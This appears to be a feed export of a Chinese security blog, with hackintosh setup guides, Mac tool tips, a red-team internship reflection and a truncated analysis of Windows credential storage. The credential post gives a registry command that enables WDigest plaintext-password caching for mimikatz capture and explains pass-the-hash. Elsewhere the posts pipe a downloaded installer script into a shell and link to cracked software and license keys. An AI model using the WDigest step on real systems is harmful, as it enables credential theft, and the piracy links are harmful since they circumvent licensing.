title="1.写入U盘使用将镜像写入U盘"></a>1.写入U盘使用将镜像写入U盘</h2><p>U盘必须大于等于16G,保证稳定性请尽量不要使用2.0或水货盘</p><p>其实镜像写入U盘工具有很多可以根据自己现在的电脑系统做选择,想装黑苹果的小伙伴大概用的都是windows吧,可选工具及下载列表如下:</p><ul><li><a href="https://www.acutesystems.com/scrtm.htm">transmac</a>,<a href="https://www.mfpud.com/topics/940/">刻录教程</a>(我用的这个工具一次成功)</li><li><a href="https://balenaetcher.en.softonic.com/">balenetcher</a>,<a href="https://apple.sqlsec.com/2-U%E7%9B%98%E5%88%B6%E4%BD%9C/2-2/">刻录教程</a>(我自己windows11真实体验写入u盘10多次没有一次成功,优点就是跨平台)</li><li><a href="https://rufus.ie/zh/">rufus</a></li></ul><h2 id="2-将BIOS中Secureboot关闭后从U盘启动"><a href="#2-将BIOS中Secureboot关闭后从U盘启动" class="headerlink" title="2.将BIOS中Secureboot关闭后从U盘启动"></a>2.将BIOS中Secureboot关闭后从U盘启动</h2><p>这个可以在重启时按相应的快捷键进入bios,机械革命系列可以按F10,在bios找到secureboot关闭,保存后退出</p><p>因为插了u盘,bios保存开机后会有选择启动项的界面,类似下图界面吧,如果有opencore可以直接选择,没有可以选择u盘名称的UEFI OS的第一个就是opencore分区</p><p><img src="https://img-blog.csdnimg.cn/img_convert/9ad60f05117a29c0a0a16f05ec875051.png" alt="截屏2023-02-13 16.25.30"></p><p>选择后可以进入opencore界面</p><p><img src="https://img-blog.csdnimg.cn/img_convert/1af2b4beb21aa09f39601d785eef1cfe.png" alt="截屏2023-02-13 16.29.16"></p><h2 id="3-在磁盘工具中抹除预留的安装分区或磁盘"><a href="#3-在磁盘工具中抹除预留的安装分区或磁盘" class="headerlink" title="3.在磁盘工具中抹除预留的安装分区或磁盘"></a>3.在磁盘工具中抹除预留的安装分区或磁盘</h2><p><img src="https://img-blog.csdnimg.cn/img_convert/074a960b63eaf659579eb9c2bdb95bf2.png" alt="img"></p><p>选择要安装macos系统的硬盘或分区,点击右上角的抹除</p><ol><li>选择硬盘的话也就是将macos安装于单独的硬盘,适用于双硬盘双系统或只黑苹果</li><li>选择分区的话也就是单硬盘安装双系统,磁盘划分可以参考<a href="https://apple.sqlsec.com/5-%E5%AE%9E%E6%88%98%E6%BC%94%E7%A4%BA/5-5/">国光师傅教程</a></li></ol><p>下图为选择分区情况,选择硬盘时多一个“分区”选择项,选择:GUID分区图</p><p><img src="https://img-blog.csdnimg.cn/img_convert/51db9608d7f9b7af172dcfbfeafb4b9e.jpeg" alt="img"></p><p>名字随意,格式需要选择macos系统格式APFS,APFS类似于windows的NTFS格式,这里需要注意的是mac不能读取NTFS格式的u盘,u盘可以格式化为exFAT确保跨双系统正常使用</p><p>抹初后退出磁盘工具</p><h2 id="4-选择安装MACOS"><a href="#4-选择安装MACOS" class="headerlink" title="4.选择安装MACOS"></a>4.选择安装MACOS</h2><p>接下来就是正常的macos安装过程,选择刚才抹除的磁盘,图形化安装即可,安装过程中系统会多次重启</p><h2 id="5-安装完成后使用DiskGenius和EasyUEFI将引导转移至本地"><a href="#5-安装完成后使用DiskGenius和EasyUEFI将引导转移至本地" class="headerlink" title="5.安装完成后使用DiskGenius和EasyUEFI将引导转移至本地"></a>5.安装完成后使用DiskGenius和EasyUEFI将引导转移至本地</h2><p>做完上一步,系统就可以正常使用了,因为现在macos是u盘引导启动的,接下来要做的就是把引导复制到固态硬盘中,这一步可以在Windows进行也可以在macos中进行,Windows可以使用Disk Genius,macos可以用<a href="https://macdownload.informer.com/opencore-configurator/download/">occ(opencore-configurator)</a></p><p>打开之后,选择右上角的 OCC 图标,点击,找到自己的安装系统的硬盘,点击”挂载分区“</p><p><img src="https://img-blog.csdnimg.cn/img_convert/39fe83c8947ef09252518fa2f3a532f0.png" alt="截屏2023-02-13 17.16.26"></p><p>挂载u盘引导分区</p><p><img src="https://img-blog.csdnimg.cn/img_convert/1b8f54875b8d1cd85e70df10b955e558.png" alt="截屏2023-02-13 17.20.43"></p><p>将oc目录复制到硬盘目录下</p><p><img src="https://img-blog.csdnimg.cn/img_convert/d2f05fcfb1409bb7869aa10579f6c7dd.jpeg" alt="img"></p><p>因为我这次是双硬盘双系统,所以可以不用使用工具去创建启动项,直接在bios中将里面将磁盘的引导设置第 1 启动即可</p><p>如果是单硬盘双系统可以使用EasyUEFI或者Diskgenius工具创建启动项</p><p><strong>EasyUEFI 破解版下载地址</strong>:<a href="https://sqlsec.lanzouw.com/i4amxzmj1cj">https://sqlsec.lanzouw.com/i4amxzmj1cj</a></p><p>EasyUEFI使用步骤如下</p><ol><li><p>选择管理EFI启动项</p><p><img src="https://img-blog.csdnimg.cn/img_convert/2f414769a83f91fcb91cf6937d4a7928.png" alt="截屏2023-02-13 17.24.29"></p></li><li><p>选择创建新项</p><p><img src="https://img-blog.csdnimg.cn/img_convert/2a966fbc8c5b868c83e7491319536e20.jpeg" alt="img"></p></li><li><p>操作系统类型选择Linux 或者其他操作系统,描述随便,目标分区选择硬盘的第一个 ESP 引导分区,然后点击浏览数据,选择 EFI/OC/ 目录下的 OpenCpre.efi 文化后,点击确定即可</p><p><img src="https://img-blog.csdnimg.cn/img_convert/ee78ddeae0e4cd7e0868ec861ba81ee7.jpeg" alt="img"></p><p>上移启动项为第一项</p><p><img src="https://img-blog.csdnimg.cn/img_convert/a70b1898ac0eb0ddd0c42d7090af038d.jpeg" alt="img"></p></li></ol><p>如果启动时仍旧无法选择,可以在bios中修改启动项,自此黑苹果安装完毕</p><h1 id="优化-系统迁移"><a href="#优化-系统迁移" class="headerlink" title="优化-系统迁移"></a>优化-系统迁移</h1><p>因为原来的系统盘是256G的stat3固态,现在手头有两个1t固态,一个已经装了macos,另一个准备替换原来的win所在的256G系统盘将系统迁移到1t固态上,正好用上两个固态插槽</p><p>做系统迁移也很简单,直接使用DiskGenius就可以了,当然也有其他的工具比如海康威视固态自带的工具magiclBox,可以系统迁移也可以做全盘迁移</p><ol><li><p>Diskgenius 工具-系统迁移</p><p><img src="https://img-blog.csdnimg.cn/img_convert/205d0651d48765672d5d09bd5fde2245.png" alt="系统迁移"></p></li><li><p>选择目标盘,目标磁盘可以小于源磁盘,但是目标磁盘容量需大于源磁盘的已用数据总量</p><p><img src="https://img-blog.csdnimg.cn/img_convert/8e71e0c0936863e3e6f915a5b7d7f5ca.png" alt="系统迁移"></p><p>接下来按提示操作即可,擦出磁盘,迁移模式选择热迁移等待片刻重启即可</p></li></ol><p>具体可以看DG的官方教程:<a href="https://www.diskgenius.cn/help/system-migration.php">链接</a></p><h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><ol><li><p>目前系统没什么bug,小版本可以直接在系统设置中更新,大版本需要考虑等大神的efi</p><p>但更新完成后请记得关闭Filevault(文件保险箱),更新完成后的设置后可能会出现此小房子图标的勾选,请记得去掉勾选</p></li><li><p>因为是intel网卡,Wi-Fi和蓝牙可以正常使用,随航和隔空投送功能不可使用,需要替换博通网卡,大部分机器显卡没有驱动不能正常使用</p></li><li><p>在就是说Windows系统磁盘格式为ntfs文件系统格式,mac系统磁盘格式为apfs文件系统格式,两系统都能使用的是exFAT格式,如果是u盘或者用一个硬盘安装双系统另一硬盘也可用此格式</p><blockquote><p>读写NTFS问题:MACOS原生仅仅支持对NTFS分区进行读操作,不可进行写入,如使用脚本、软件强制开启NTFS独显,可能会导致WIN蓝屏报错,建议划分出一块EXFAT分区进行读写操作</p></blockquote></li><li><p>如果某个工具一直不成功可以考虑换一个工具</p></li><li><p>在macos中可以明显感觉出比在win11中电脑运行速度有所提升,内存占用也减少了,风扇转的也少了</p></li><li><p>键盘问题有一些按键对应根据键盘区别也有所不同,触控板手势肯定没macbook好用</p></li><li><p>还有意外收获,在win下不能识别也不能正常格式化的金士顿16G u盘,在macos下抹除后竟然可以用了,amazing!!!</p></li></ol><p><img src="https://img-blog.csdnimg.cn/6af074c49a8e4c2ea4913845183d1d70.png" alt="在这里插入图片描述"></p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/img_convert/8ba3e95f30711a4d9397800037e6777e.png"><br>机械革命z2黑苹果改造计划</p>
<p>原来的系统硬盘才256G实在太小了,趁固态便宜搞</summary>
<category term="黑苹果" scheme="https://oceansec.github.io/categories/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
<category term="黑苹果" scheme="https://oceansec.github.io/tags/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
</entry>
<entry>
<title>新博客介绍,旧博客地址:https://oceansec.blog.csdn.net</title>
<link href="https://oceansec.github.io/2023/12/05/%E6%96%B0%E5%8D%9A%E5%AE%A2%E4%BB%8B%E7%BB%8D%EF%BC%8C%E6%97%A7%E5%8D%9A%E5%AE%A2%E5%9C%B0%E5%9D%80%EF%BC%9Aoceansec.blog.csdn.net/"/>
<id>https://oceansec.github.io/2023/12/05/%E6%96%B0%E5%8D%9A%E5%AE%A2%E4%BB%8B%E7%BB%8D%EF%BC%8C%E6%97%A7%E5%8D%9A%E5%AE%A2%E5%9C%B0%E5%9D%80%EF%BC%9Aoceansec.blog.csdn.net/</id>
<published>2023-12-05T02:59:04.860Z</published>
<updated>2022-09-07T03:16:18.740Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png" alt="img"></p><p>欢迎来到 Ocean 的新博客,旧博客 <a href="https://oceansec.blog.csdn.net/">oceansec.blog.csdn.net</a> 将不再更新,新博客将对发布内容深度提升,不再是小白文了哈哈哈,希望大家能到学到东西</p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png" alt="img"></p>
<p>欢迎来到 Ocean 的新博客,旧博客 <a href="https://oceans</summary>
<category term="介绍" scheme="https://oceansec.github.io/categories/%E4%BB%8B%E7%BB%8D/"/>
<category term="介绍" scheme="https://oceansec.github.io/tags/%E4%BB%8B%E7%BB%8D/"/>
</entry>
<entry>
<title>年中结</title>
<link href="https://oceansec.github.io/2023/12/05/%E5%B9%B4%E4%B8%AD%E7%BB%93/"/>
<id>https://oceansec.github.io/2023/12/05/%E5%B9%B4%E4%B8%AD%E7%BB%93/</id>
<published>2023-12-05T02:59:04.858Z</published>
<updated>2022-09-09T06:17:38.430Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png" alt="img"></p><p>好像上半年只有两件事情,找实习和实习哈哈哈,找实习之前有总结过,这次主要说下实习</p><p>两个月前的我以蓝军实习生的身份进入 JD,记得刚下地铁站出门望去就是 JD 大楼,不得不说 JD 真的挺大的。初入社会的走向工作的我还有些不适应,总是忘记上下班打卡,总是不知道开会该说些啥,两个月的时间让我成长了许多,明白了工作要有产出,知道了做一个社畜的自我修养工作呢,我平时主要的任务基本就三项:</p><ul><li>学习提升</li><li>内部赋能</li><li>HW</li></ul><p>先来谈谈我的学习,蓝军给实习生的学习成长空间是真的足,基本一半的时间都可以自己安排进行学习。因为之前打内网的时候 mimikatz 这些工具用的就比较多,但是不了解这些工具为什么能够实现这样的效果,还有就是一个合格的安全工程师怎么能少的了学习 Windows 呢,因为Windows体系真的挺庞大的。打内网不用说了全是 Windows 的协议 Ntlm、Kerberos,免杀更是在Windows环境下和杀软斗志斗勇,如果连Windows都不了解咋去搞,还有就是钓鱼这个和Word、PE格式文件又密不可分</p><p>我是从 Windows 内核开始学起,然后去了解 Windows 安全机制,其中涉及挺多 C/C++/C# 代码的,所以看起来还是比较费力的,中间由于两次 hw 现在还是没有搞透彻,Windows 这条路还很长,还需要深入研究,争取早日成为免杀大帝,之后会把笔记整理放到博客上呀</p><p>HW 呢,谁能想到两个月的实习能赶上一年唯二参加的两次 hw,不知道是幸运还是不幸。黑白颠倒还是有些不适应,也得了蜜罐 PTSD,懂得了只有做到全套匿名才能不蹑手蹑脚随便搞,经过 hw 也是学到了挺多技巧,也感受到了钓鱼佬的快乐,鱼在手天下有,蓝军大佬自研的 c2 真滴好用,还有很多东西需要学习,学习路漫漫,向大佬们学习</p><p>通过实习终于是体会到了打工人的生活,遇到了好多大佬也发现自己的不足还有很多技术栈需要去补充,学习和实践还是有很大的差距的,这也是给以后的学习提了个醒,每个学习目标都需要有产出,做一个合格的打工人</p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png" alt="img"></p>
<p>好像上半年只有两件事情,找实习和实习哈哈哈,找实习之前有总结过,这次主要说下实习</p</summary>
<category term="总结" scheme="https://oceansec.github.io/categories/%E6%80%BB%E7%BB%93/"/>
<category term="总结" scheme="https://oceansec.github.io/tags/%E6%80%BB%E7%BB%93/"/>
</entry>
<entry>
<title>机械革命z2黑苹果改造计划第二番-MacOS实用软件&渗透工具</title>
<link href="https://oceansec.github.io/2023/12/05/%E5%8F%8C%E7%B3%BB%E7%BB%9F%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92%E7%AC%AC%E4%BA%8C%E7%95%AA-%E5%AE%9E%E7%94%A8%E8%BD%AF%E4%BB%B6/"/>
<id>https://oceansec.github.io/2023/12/05/%E5%8F%8C%E7%B3%BB%E7%BB%9F%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92%E7%AC%AC%E4%BA%8C%E7%95%AA-%E5%AE%9E%E7%94%A8%E8%BD%AF%E4%BB%B6/</id>
<published>2023-12-05T02:59:04.856Z</published>
<updated>2023-02-14T09:04:55.960Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/img_convert/8ba3e95f30711a4d9397800037e6777e.png"></p><p>机械革命z2黑苹果改造计划第二番-实用软件</p><h1 id="Mac实用工具"><a href="#Mac实用工具" class="headerlink" title="Mac实用工具"></a>Mac实用工具</h1><p>这是旧电脑改造计划的第二篇,就是安装一些常用软件和一些渗透测试工具,武装灵魂成为真正的生产力工具</p><p>首先推荐一个网站,<a href="http://www.mactools.app/">www.mactools.app</a>,这个软件里边有大多数常用的软件和一些渗透测试工具,而且都是「加工」过的,可以直接使用</p><p><img src="https://img-blog.csdnimg.cn/img_convert/e170c75557d264b5be15e2457e07d736.png" alt="截屏2023-02-14 15.26.37"></p><p>还有一个网站就是机械革命黑果论坛,里边也提供了一些软件技巧和软件可供下载</p><ul><li><a href="https://www.cmbs-soft.com/category/userful-skills">实用技巧</a></li><li><a href="https://www.cmbs-soft.com/category/developer-tools">实用软件</a></li></ul><p><img src="https://img-blog.csdnimg.cn/img_convert/d9d8dca22f4bab7473e14b341ae8ae54.png" alt="截屏2023-02-14 16.46.24"></p><p>除此之外还要一些软件和遇到的问题</p><ol><li><p>Homebrew</p><p>Homebrew是一款自由及开放源代码的软件包管理系统,用以简化macOS系统上的软件安装过程,可以理解为linux apt-get/yum</p><p>安装是非常简单的,网上提供了现成的安装命令</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/bin/zsh -c <span class="string">"<span class="subst">$(curl -fsSL https://gitee.com/cunkai/HomebrewCN/raw/master/Homebrew.sh)</span>"</span></span><br></pre></td></tr></table></figure><p>安装之后,可以通过brew去安装其他工具,相关工具列表,<a href="https://www.cnblogs.com/simono/p/16629284.html">链接</a></p><p>什么python、Java、go等环境也可以通过brew去安很方便</p></li><li><p>vmware fusion 这个工具其实没啥好说的,就是虚拟机,macos上有parallels desktop可以选择更好用点,但是vmware厉害生成虚拟机一般都可以在macOS/win上互相用,而且vmware在「白嫖」方面更加友好,网上随便一搜就有</p><p>因为我原来的win电脑上有十多个虚拟机,可以直接在文件-扫描虚拟机找到全部虚拟机</p><p>如果不能导入的可以参考以下方法</p><ul><li>把整个目录的目录名加上后缀 .vmwarevm 双击就可以直接用vmfusion打开了</li></ul><p>如果还不行的话就在win系统上导出为ovf文件</p><ol><li><p>在windows把虚拟机导出成开放虚拟机文件.ovf</p></li><li><p>一共产三个文件 .ovf,.mf,.vmdk</p></li><li><p>把这三个文件拷贝到mac下</p></li><li><p>用funsion导入虚拟机</p></li></ol><p>还有就是我在vmware安装之后启动闪退,后来也找到了方法</p><blockquote><p>打开「访达」,「应用程序」,找到「VMware Fusion」,点击「右键」(辅助点按),选择「显示包内容」,依次进入「Contents」/「Library」,找到这个文件「Deploy VMware Fusion.mpkg」,双击运行并按照向导完成安装。重新双击运行「VMware Fusion」,即不再闪退</p></blockquote></li><li><p>parallels desktop</p><p>更适合macOS的虚拟机,<a href="https://luoxx.top/archives/pd-18-active">激活方式</a></p></li><li><p>Typora</p><p>我认为最好用的文档工具没有之一,现在最新版是收费版本,只需要下载原来的beta版本即可</p><ol><li><p>Windows 64bit (exe)</p><p><a href="https://link.zhihu.com/?target=https://download.typora.io/windows/typora-setup-x64-0.11.18.exe">https://download.typora.io/windows/typora-setup-x64-0.11.18.exe</a></p></li><li><p>Windows 32bit (exe)</p><p><a href="https://link.zhihu.com/?target=https://download.typora.io/windows/typora-setup-ia32-0.11.18.exe">https://download.typora.io/windows/typora-setup-ia32-0.11.18.exe</a></p></li><li><p>MacOS</p><p><a href="https://link.zhihu.com/?target=https://download.typora.io/mac/Typora-0.11.18.dmg">https://download.typora.io/mac/Typora-0.11.18.dmg</a></p></li><li><p>Linux</p><p><a href="https://link.zhihu.com/?target=https://download.typora.io/linux/typora_0.11.18_amd64.deb">https://download.typora.io/linux/typora_0.11.18_amd64.deb</a></p></li></ol></li><li><p>iStat Menus</p><p>可以在通知栏显示一些电脑的基本信息</p><p><a href="https://gist.github.com/yutao8/bc64680dbeb5f5ba17475b5c4f717e55">iStat Menus for mac License</a></p><p><img src="https://img-blog.csdnimg.cn/img_convert/40494168385380f4a986ef292f4395e5.jpeg" alt="iStat Menus 6.6 affiche les températures des Mac M1 | MacGeneration"></p></li><li><p>屏幕录制转gif图片</p><ul><li><p>可以直接用<a href="https://www.cockos.com/licecap/">licecap</a>这个软件,缺点就是无法录到下方导航栏</p></li><li><p>使用Quicktime player录制屏幕然后使用ffmpeg工具将mov视频转为gif图片,命令如下</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ffmpeg -i file.mov -r 15 file.gif</span><br></pre></td></tr></table></figure></li></ul></li></ol><p><img src="https://img-blog.csdnimg.cn/6af074c49a8e4c2ea4913845183d1d70.png" alt="在这里插入图片描述"></p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/img_convert/8ba3e95f30711a4d9397800037e6777e.png"></p>
<p>机械革命z2黑苹果改造计划第二番-实用软件</p>
<h1 id="Mac实用工具</summary>
<category term="黑苹果" scheme="https://oceansec.github.io/categories/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
<category term="黑苹果" scheme="https://oceansec.github.io/tags/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
</entry>
<entry>
<title>机械革命黑苹果改造计划第四番-外接显示器、win时间不正确问题解决</title>
<link href="https://oceansec.github.io/2023/12/05/%E5%8F%8C%E7%B3%BB%E7%BB%9F%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92-%E9%97%AE%E9%A2%98%E8%A7%A3%E5%86%B3%E7%AF%87/"/>
<id>https://oceansec.github.io/2023/12/05/%E5%8F%8C%E7%B3%BB%E7%BB%9F%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92-%E9%97%AE%E9%A2%98%E8%A7%A3%E5%86%B3%E7%AF%87/</id>
<published>2023-12-05T02:59:04.854Z</published>
<updated>2023-02-20T10:55:18.700Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/9e2650d2eea947c39aeca1dbc790e72b.png" alt="在这里插入图片描述"></p><h1 id="问题"><a href="#问题" class="headerlink" title="问题"></a>问题</h1><h2 id="1-无法外接显示器"><a href="#1-无法外接显示器" class="headerlink" title="1.无法外接显示器"></a>1.无法外接显示器</h2><p>最大的问题就是目前无法外接显示器,因为机械革命大多数型号笔记本电脑的HDMI、DP接口都是直接物理接在独显上的,内屏用核显外接显示器接独显,英伟达独显也是黑苹果无法驱动的,而且发现机械革命tpyec接口还减配了没有视频功能真拉胯,这个问题也是要区别对待的,可以看看自己的电脑支不支持在bios切换显卡模式,有独显直连、混合模式(独显运算核显输出)</p><p>在网上找了好多教程,只找到了一种折中的解决方法,就是使用支持display link技术的外置usb3.0显卡(或者称为usb显卡适配器)</p><p><img src="https://img-blog.csdnimg.cn/img_convert/7f768bc17356ada490b4f779f46cf82c.png" alt="img"></p><p>display link</p><blockquote><p>DisplayLink是一个通过USB接口实现显示器连接到电脑的连接技术,可以非常简单、方便的连接电脑和多个显示设备。该技术可以通过USB接口扩展虚拟的电脑的桌面。DisplayLink技术最多可以支持6台显示器同时显示32位色彩的任意分辨率画面</p><p>DisplayLink可以通过一个自建驱动,在系统中模拟出多个显示器设备,并且通过USB接口将数据输出到外部DisplayLink芯片,并且转换为DisplayPort 或者HDMI信号,从而驱动多台显示器</p></blockquote><p>这样虽然是可以实现外接屏幕,但是由于DisplayLink是使用软件去压缩视频信号,因此它本身也依赖于系统的CPU,并且在视频画面变化比较剧烈的时候,需要的CPU资源会相比静态画面时要求更高,可能会出现延迟</p><p>再就是usb外置显卡在价格上面也是比较贵的,一般百元以内的都不是display link芯片,且最高只能支持1080p 60hz,最新的display link DL-6000系列芯片可以支持4k60hz分辨率,在 DisplayLink 官方网站的<a href="https://www.synaptics.com/products/displaylink-graphics/displaylink-products-list">产品列表</a>可以查到了一些使用DL-6950芯片的扩展坞,购买时一定要认准,多可以去闲鱼淘淘宝</p><p>因为m1芯片的mac也只能支持一台外接显示器,有人把display link用到了外接屏幕上,<a href="https://xujiwei.com/blog/2021/07/m1-displaylink-testing/">就是要 4K 双显,M1 MacBook Pro + DisplayLink 性能体验测试</a>,也有黑苹果大佬遇到同样的问题,<a href="https://www.iots.vip/post/displaylink-hub.html">链接</a></p><h2 id="2-双系统Windows时间不正确"><a href="#2-双系统Windows时间不正确" class="headerlink" title="2.双系统Windows时间不正确"></a>2.双系统Windows时间不正确</h2><p>装好系统后发现,每次Windows启动后系统时间总是不正确会慢8个小时,搜索之后发现是Windows和macOS计算时间的方法不一样,Windows会把硬件的时间当做本地时间,而Mac会计算UTC来当做系统时间,比如说北京时间是GMT+8,则系统中显示时间是硬件时间+8这样,当PC中同时有多系统共存时,就出现了问题</p><p>解决方法:</p><p>WIN+x 选择管理员模式进入CMD,复制下面的代码,点击CDM右键可以直接进行粘贴,然后按回车键即可。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Reg add HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation /v RealTimeIsUniversal /t REG_DWORD /d 1</span><br></pre></td></tr></table></figure><p>运行后重启电脑即可</p><p><img src="https://img-blog.csdnimg.cn/a2f8e34dc109445eb05ee5f1126aa780.png" alt="在这里插入图片描述"></p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/9e2650d2eea947c39aeca1dbc790e72b.png" alt="在这里插入图片描述"></p>
<h1 id="问题"><a href="#问题" class="headerl</summary>
<category term="黑苹果" scheme="https://oceansec.github.io/categories/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
<category term="黑苹果" scheme="https://oceansec.github.io/tags/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
</entry>
<entry>
<title>windows凭证机制浅析</title>
<link href="https://oceansec.github.io/2023/12/05/windows%E5%87%AD%E8%AF%81%E6%9C%BA%E5%88%B6%E6%B5%85%E6%9E%90/"/>
<id>https://oceansec.github.io/2023/12/05/windows%E5%87%AD%E8%AF%81%E6%9C%BA%E5%88%B6%E6%B5%85%E6%9E%90/</id>
<published>2023-12-05T02:59:04.852Z</published>
<updated>2022-09-14T09:19:31.410Z</updated>
<content type="html"><![CDATA[<p><img src="https://s2.loli.net/2022/09/08/61wuRfy4nZWcVrB.png"></p><p>我们知道在 win10/server2012 及以上版本开启 Wdigest 的情况下通过 mimikatz 是拿不到明文密码的,需要通过注册表开启 wdigest 才能抓到明文密码,本文通过 windbg 调试来看内存中发生了怎样的变化</p><p>在调试之前先来看一下 Windows 凭证机制的基础知识</p><h1 id="Windows凭证机制"><a href="#Windows凭证机制" class="headerlink" title="Windows凭证机制"></a>Windows凭证机制</h1><h2 id="关键基础设施"><a href="#关键基础设施" class="headerlink" title="关键基础设施"></a>关键基础设施</h2><h3 id="SAM文件"><a href="#SAM文件" class="headerlink" title="SAM文件"></a>SAM文件</h3><p>SAM (安全账户管理器),SAM 用来存储 Windows 操作系统密码的数据库文件,为了避免明文密码泄露,SAM 文件中保存的是明文密码经过一系列算法处理过的 Hash 值,被保存的 Hash 分为 <strong>LM Hash(现已废弃)、NTLMHash(长度32bit由字母数字组成)</strong>。在用户在本地或者远程登陆系统时,会将 Hash 值与 SAM 文件中保存的 Hash 值进行对比。在后期的 Windows 系统中,SAM 文件中被保存的密码 Hash 都被密钥 SYSKEY 加密</p><ul><li>SAM 文件在磁盘中的位置在:C:\windows\system32\config\sam</li><li>SAM 文件在 Windows 系统启动后被系统锁定,无法进行移动和复制</li><li>SAM 就是用来存放用户密码、Internet Explorer 密码,服务账号密码、SQL 密码、系统账户密码、配置的计划任务账户密码</li></ul><h3 id="Lsass进程"><a href="#Lsass进程" class="headerlink" title="Lsass进程"></a>Lsass进程</h3><p>本地安全管理局子系统服务 (LSASS) 是 Microsoft Windows 操作系统中的一个进程,负责在系统上强制执行安全策略。它验证用户登录到 Windows 计算机或服务器、处理密码更改、创建访问令牌等。我们常说的 dump lsass 就是对转存 Lsass 进程中的明文登陆密码</p><h2 id="Windows认证流程"><a href="#Windows认证流程" class="headerlink" title="Windows认证流程"></a>Windows认证流程</h2><h3 id="Windows本地认证"><a href="#Windows本地认证" class="headerlink" title="Windows本地认证"></a>Windows本地认证</h3><p><img src="https://s2.loli.net/2022/09/08/EGyOcXRplBtfCZw.png" alt="截屏2022-09-07 16.17.06"></p><p>Window 本地登录过程如上图所示:注销或开机后:弹出登录界面,用于接受用户输入,winlogon.exe 进程用于管理用户的登录和退出,用户输入密码进行登录时发生如下操作:</p><ol><li>winlogon.exe 进程将账号密码给 lsass.exe 进程进行处理,并将明文密码缓存在进程中</li><li>lsass.exe 进程,将明文密码加密成 NTLM Hash,对 SAM 数据库比较认证</li></ol><p>如果比较结果相同则登录成功,不相同登录失败,分析整个过程会存在两个问题:</p><ol><li>lsass.exe 进程会将明文密码换存在进程中,这也是为什么低版本系统可以直接抓到明文密码的原因</li><li>使用 NTLM hash 进行比较,由于 NTLM 协议没有对认证发起人进行校验,如果攻击者通过某些手段可以拿到 hash,攻击者可以通过捕获密码的 hash 值(对应着密码的值),以此来横向访问其他网络系统,即 PTH 哈希传递攻击</li></ol><p>补充:除了本地认证还有基于 NTLM 协议实现的网络认证和基于 Kerberos 协议实现的域认证</p><h1 id="什么是Wdigest?"><a href="#什么是Wdigest?" class="headerlink" title="什么是Wdigest?"></a>什么是Wdigest?</h1><p>WDigest 即摘要身份验证,摘要身份验证是一种质询/响应协议,主要在 Windows Server 2003 中用于 LDAP 和基于 Web 的身份验证。它利用超文本传输协议 (HTTP) 和简单身份验证安全层 (SASL) 交换进行身份验证。WDigest 的问题是它将密码存储在内存中,并且无论是否使用它,都会将其存储在内存中</p><p>在 win 7 和 2008 r2 及之前都是默认开启 Wdigest 且无法禁用,需要额外安装 KB2871997 补丁禁用 wdigest(但是 WIN7 以及 08 以后的系统中微软都默认禁止了 Wdigest 协议)</p><p>所以在 win10/server2012 及以上版本关闭 Wdigest 的情况下,抓密码需要手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录 = 截取明文密码</p><p>修改注册表的命令:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f</span><br></pre></td></tr></table></figure><p>也可以通过 powershell、msf 等修改注册表</p><p>关于 mimikatz 是如何实现 sekurlsa::wdigest 的代码分析可以看这篇文章:<a href="https://www.anquanke.com/post/id/235232">调试mimikatz源码:wdigest功能源码调试详细过程及分析</a></p><h1 id="windbg调试"><a href="#windbg调试" class="headerlink" title="windbg调试"></a>windbg调试</h1><p>Windbg 是微软开发的免费源码级调试工具。Windbg 可以用于 Kernel 模式调试和用户模式调试,还可以调试 Dump 文件</p><p>官方文档及下载地址:<a href="https://docs.microsoft.com/zh-cn/windows-hardware/drivers/debugger/debugger-download-tools">https://docs.microsoft.com/zh-cn/windows-hardware/drivers/debugger/debugger-download-tools</a></p><p>在调试 windows 时,无法简单地将 WinDBG 附加到 <code>lsass</code> 上,如果这么操作,Windows 会停止运行,警告用户系统即将重启。因此,我们需要 attach 内核,然后从 Ring-0 切换到 <code>lsass </code>进程</p><h2 id="双机远程调试环境搭建"><a href="#双机远程调试环境搭建" class="headerlink" title="双机远程调试环境搭建"></a>双机远程调试环境搭建</h2><p>实验环境</p><ul><li>Windows 11 物理机 + windbg</li><li>Windows 10 虚拟机(桥接模式)</li></ul><p>微软</p><p>旧版使用com接口:</p><ul><li><a href="https://blog.csdn.net/youyudexiaowangzi/article/details/122012424">win10使用winDbg与VMware中的win7进行双机调试</a></li></ul><p>新版使用网络连接:</p><ul><li><p><a href="https://docs.microsoft.com/zh-cn/windows-hardware/drivers/debugger/setting-up-a-network-debugging-connection-automatically">自动设置 KDNET 网络内核调试</a></p><p>注意:运行调试器的计算机称为<em>主计算机</em>,正在调试的计算机称为<em>目标计算机</em>。 使用自动设置主计算机必须运行 Windows 7 